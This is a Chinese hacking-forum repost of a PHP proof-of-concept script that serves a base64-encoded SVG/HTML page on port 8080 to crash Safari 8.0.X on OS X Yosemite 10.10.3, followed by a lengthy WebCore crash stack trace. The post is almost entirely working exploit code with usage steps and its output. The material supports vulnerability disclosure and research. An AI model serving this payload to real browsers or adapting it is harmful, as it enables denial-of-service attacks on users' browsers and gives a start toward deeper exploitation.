搜索
中国白客联盟»论坛 Techniques 0day及EXP(0day and POC) Safari 8.0.X / OS X Yosemite 10.10.3 - Crash Proof O ...
返回列表 发新帖
查看: 184|回复: 0

Safari 8.0.X / OS X Yosemite 10.10.3 - Crash Proof Of Concept

[复制链接]
admin

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2015-7-8 12:10:41 | 显示全部楼层 |阅读模式
  1. #!/usr/bin/php
  2. <?php
  3. # Title          :  Safari 8.0.X / OS X Yosemite 10.10.3 Crash Proof Of
  4. Concept
  5. # Product Website:  [url]https://www.apple.com/safari/[/url]
  6. # Author         :  Mohammad Reza Espargham
  7. # Linkedin       :  [url]https://ir.linkedin.com/in/rezasp[/url]
  8. # E-Mail         :  me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
  9. # Website        :  [url]www.reza.es[/url]
  10. # Twitter        :  [url]https://twitter.com/rezesp[/url]
  11. # FaceBook       :  [url]https://www.facebook.com/mohammadreza.espargham[/url]
  12.    
  13.    
  14.    
  15. # Usage :
  16. # php poc.php
  17. # Open Safari and open ip:8080 / 127.0.0.1:8080
  18. # Crashed ;)
  19.    
  20. #Main POC Code
  21. $reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create
  22. socket!');
  23. socket_bind($reza, 0,8080);
  24. socket_listen($reza);
  25. print "\nNow Open Safari and open ip:8080 / 127.0.0.1:8080\n\n";
  26. $msg =
  27. 'PGh0bWw+CjxzdHlsZT4Kc3ZnIHsKICAgIHBhZGRpbmctdG9wOiAxMzk0JTsKICAgIGJveC1zaXppbmc6IGJvcmRlci1ib3g7Cn0KPC9zdHlsZT4KPHN2ZyB2aWV3Qm94PSIxIDIgNTAwIDUwMCIgd2lkdGg9IjkwMCIgaGVpZ2h0PSI5MDAiPgo8cG9seWxpbmUgcG9pbnRzPSIxIDEsMiAyIj48L3BvbHlsaW5lPgo8L3N2Zz4KPC9odG1sPg==';
  28. $msgd=base64_decode($msg);
  29. for (;;) {
  30.          if ($client = @socket_accept($reza)) {
  31.              socket_write($client, "HTTP/1.1 200 OK\r\n" .
  32.              "Content-length: " . strlen($msgd) . "\r\n" .
  33.              "Content-Type: text/html; charset=UTF-8\r\n\r\n" .
  34.              $msgd);
  35.          }
  36.          else usleep(100000);
  37. }
  38.    
  39.    
  40.    
  41.    
  42.    
  43. #Crash Report
  44. /*
  45.    
  46. Process Model:
  47. Multiple Web Processes
  48.    
  49.    
  50. Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
  51. 0   libsystem_kernel.dylib          0x00007fff8e628286 __pthread_kill +
  52. 10
  53. 1   libsystem_c.dylib               0x00007fff90619b53 abort + 129
  54. 2   libsystem_c.dylib               0x00007fff905e1c39 __assert_rtn + 321
  55. 3   com.apple.CoreGraphics          0x00007fff87716e4e
  56. CGPathCreateMutableCopyByTransformingPath + 242
  57. 4   com.apple.CoreGraphics          0x00007fff8773aff0 CGContextAddPath +
  58. 93
  59. 5   com.apple.WebCore               0x0000000104ea8c84
  60. WebCore::GraphicsContext::fillPath(WebCore::Path const&) + 148
  61. 6   com.apple.WebCore               0x000000010597e851
  62. WebCore::RenderSVGResourceSolidColor::postApplyResource(WebCore::RenderElement&,
  63. WebCore::GraphicsContext*&, unsigned short, WebCore::Path const*,
  64. WebCore::RenderSVGShape const*) + 65
  65. 7   com.apple.WebCore               0x000000010597f08a
  66. WebCore::RenderSVGShape::fillShape(WebCore::RenderStyle const&,
  67. WebCore::GraphicsContext*) + 122
  68. 8   com.apple.WebCore               0x000000010597f3c3
  69. WebCore::RenderSVGShape::fillStrokeMarkers(WebCore::PaintInfo&) + 131
  70. 9   com.apple.WebCore               0x0000000104fa73cb
  71. WebCore::RenderSVGShape::paint(WebCore::PaintInfo&, WebCore::LayoutPoint
  72. const&) + 379
  73. 10  com.apple.WebCore               0x0000000104fa7062
  74. WebCore::RenderSVGRoot::paintReplaced(WebCore::PaintInfo&,
  75. WebCore::LayoutPoint const&) + 1330
  76. 11  com.apple.WebCore               0x0000000104f1ee72
  77. WebCore::RenderReplaced::paint(WebCore::PaintInfo&, WebCore::LayoutPoint
  78. const&) + 722
  79. 12  com.apple.WebCore               0x0000000105429e88
  80. WebCore::InlineElementBox::paint(WebCore::PaintInfo&,
  81. WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) +
  82. 312
  83. 13  com.apple.WebCore               0x0000000104ea4a63
  84. WebCore::InlineFlowBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint
  85. const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 1251
  86. 14  com.apple.WebCore               0x0000000104ea4509
  87. WebCore::RootInlineBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint
  88. const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 89
  89. 15  com.apple.WebCore               0x0000000104e53d96
  90. WebCore::RenderLineBoxList::paint(WebCore::RenderBoxModelObject*,
  91. WebCore::PaintInfo&, WebCore::LayoutPoint const&) const + 694
  92. 16  com.apple.WebCore               0x0000000104e51373
  93. WebCore::RenderBlock::paintContents(WebCore::PaintInfo&,
  94. WebCore::LayoutPoint const&) + 67
  95. 17  com.apple.WebCore               0x0000000104e50724
  96. WebCore::RenderBlock::paintObject(WebCore::PaintInfo&,
  97. WebCore::LayoutPoint const&) + 420
  98. 18  com.apple.WebCore               0x0000000104e529af
  99. WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint
  100. const&) + 287
  101. 19  com.apple.WebCore               0x00000001058db139
  102. WebCore::RenderBlock::paintChild(WebCore::RenderBox&,
  103. WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&,
  104. bool) + 393
  105. 20  com.apple.WebCore               0x0000000104e51478
  106. WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&,
  107. WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 72
  108. 21  com.apple.WebCore               0x0000000104e51420
  109. WebCore::RenderBlock::paintContents(WebCore::PaintInfo&,
  110. WebCore::LayoutPoint const&) + 240
  111. 22  com.apple.WebCore               0x0000000104e50724
  112. WebCore::RenderBlock::paintObject(WebCore::PaintInfo&,
  113. WebCore::LayoutPoint const&) + 420
  114. 23  com.apple.WebCore               0x0000000104e529af
  115. WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint
  116. const&) + 287
  117. 24  com.apple.WebCore               0x0000000104e512b2
  118. WebCore::RenderLayer::paintForegroundForFragmentsWithPhase(WebCore::PaintPhase,
  119. WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow> const&,
  120. WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo
  121. const&, unsigned int, WebCore::RenderObject*) + 370
  122. 25  com.apple.WebCore               0x0000000104e50f87
  123. WebCore::RenderLayer::paintForegroundForFragments(WTF::Vector<WebCore::LayerFragment,
  124. 1ul, WTF::CrashOnOverflow> const&, WebCore::GraphicsContext*,
  125. WebCore::GraphicsContext*, WebCore::LayoutRect const&, bool,
  126. WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int,
  127. WebCore::RenderObject*, bool, bool) + 423
  128. 26  com.apple.WebCore               0x0000000104e4fc30
  129. WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*,
  130. WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2576
  131. 27  com.apple.WebCore               0x0000000104e4f002
  132. WebCore::RenderLayer::paintLayer(WebCore::GraphicsContext*,
  133. WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 1010
  134. 28  com.apple.WebCore               0x0000000104e4fd62
  135. WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*,
  136. WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2882
  137. 29  com.apple.WebCore               0x0000000104e7ac36
  138. WebCore::RenderLayerBacking::paintIntoLayer(WebCore::GraphicsLayer
  139. const*, WebCore::GraphicsContext*, WebCore::IntRect const&, unsigned
  140. int, unsigned int) + 358
  141. 30  com.apple.WebCore               0x000000010593757f
  142. WebCore::RenderLayerBacking::paintContents(WebCore::GraphicsLayer
  143. const*, WebCore::GraphicsContext&, unsigned int, WebCore::FloatRect
  144. const&) + 799
  145. 31  com.apple.WebCore               0x000000010537dd44
  146. WebCore::GraphicsLayer::paintGraphicsLayerContents(WebCore::GraphicsContext&,
  147. WebCore::FloatRect const&) + 132
  148. 32  com.apple.WebCore               0x00000001058b6ad9
  149. WebCore::PlatformCALayer::drawLayerContents(CGContext*,
  150. WebCore::PlatformCALayer*, WTF::Vector<WebCore::FloatRect, 5ul,
  151. WTF::CrashOnOverflow>&) + 361
  152. 33  com.apple.WebCore               0x0000000105b170a7
  153. WebCore::TileGrid::platformCALayerPaintContents(WebCore::PlatformCALayer*,
  154. WebCore::GraphicsContext&, WebCore::FloatRect const&) + 167
  155. 34  com.apple.WebCore               0x0000000105ba36cc -[WebSimpleLayer
  156. drawInContext:] + 172
  157. 35  com.apple.QuartzCore            0x00007fff8d7033c7
  158. CABackingStoreUpdate_ + 3306
  159. 36  com.apple.QuartzCore            0x00007fff8d7026d7
  160. ___ZN2CA5Layer8display_Ev_block_invoke + 59
  161. 37  com.apple.QuartzCore            0x00007fff8d702694
  162. x_blame_allocations + 81
  163. 38  com.apple.QuartzCore            0x00007fff8d6f643c
  164. CA::Layer::display_() + 1546
  165. 39  com.apple.WebCore               0x0000000105ba35eb -[WebSimpleLayer
  166. display] + 43
  167. 40  com.apple.QuartzCore            0x00007fff8d6f47fd
  168. CA::Layer::display_if_needed(CA::Transaction*) + 603
  169. 41  com.apple.QuartzCore            0x00007fff8d6f3e81
  170. CA::Layer::layout_and_display_if_needed(CA::Transaction*) + 35
  171. 42  com.apple.QuartzCore            0x00007fff8d6f3612
  172. CA::Context::commit_transaction(CA::Transaction*) + 242
  173. 43  com.apple.QuartzCore            0x00007fff8d6f33ae
  174. CA::Transaction::commit() + 390
  175. 44  com.apple.QuartzCore            0x00007fff8d701f19
  176. CA::Transaction::observer_callback(__CFRunLoopObserver*, unsigned long,
  177. void*) + 71
  178. 45  com.apple.CoreFoundation        0x00007fff869f7127
  179. __CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ + 23
  180. 46  com.apple.CoreFoundation        0x00007fff869f7080
  181. __CFRunLoopDoObservers + 368
  182. 47  com.apple.CoreFoundation        0x00007fff869e8bf8
  183. CFRunLoopRunSpecific + 328
  184. 48  com.apple.HIToolbox             0x00007fff8df1156f
  185. RunCurrentEventLoopInMode + 235
  186. 49  com.apple.HIToolbox             0x00007fff8df112ea
  187. ReceiveNextEventCommon + 431
  188. 50  com.apple.HIToolbox             0x00007fff8df1112b
  189. _BlockUntilNextEventMatchingListInModeWithFilter + 71
  190. 51  com.apple.AppKit                0x00007fff8ebe59bb _DPSNextEvent +
  191. 978
  192. 52  com.apple.AppKit                0x00007fff8ebe4f68 -[NSApplication
  193. nextEventMatchingMask:untilDate:inMode:dequeue:] + 346
  194. 53  com.apple.AppKit                0x00007fff8ebdabf3 -[NSApplication
  195. run] + 594
  196. 54  com.apple.AppKit                0x00007fff8eb57354 NSApplicationMain
  197. + 1832
  198. 55  libxpc.dylib                    0x00007fff8ab77958 _xpc_objc_main +
  199. 793
  200. 56  libxpc.dylib                    0x00007fff8ab79060 xpc_main + 490
  201. 57  com.apple.WebKit.WebContent     0x0000000103f10b40 0x103f10000 + 2880
  202. 58  libdyld.dylib                   0x00007fff873e45c9 start + 1
  203. */
  204. ?>
复制代码
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表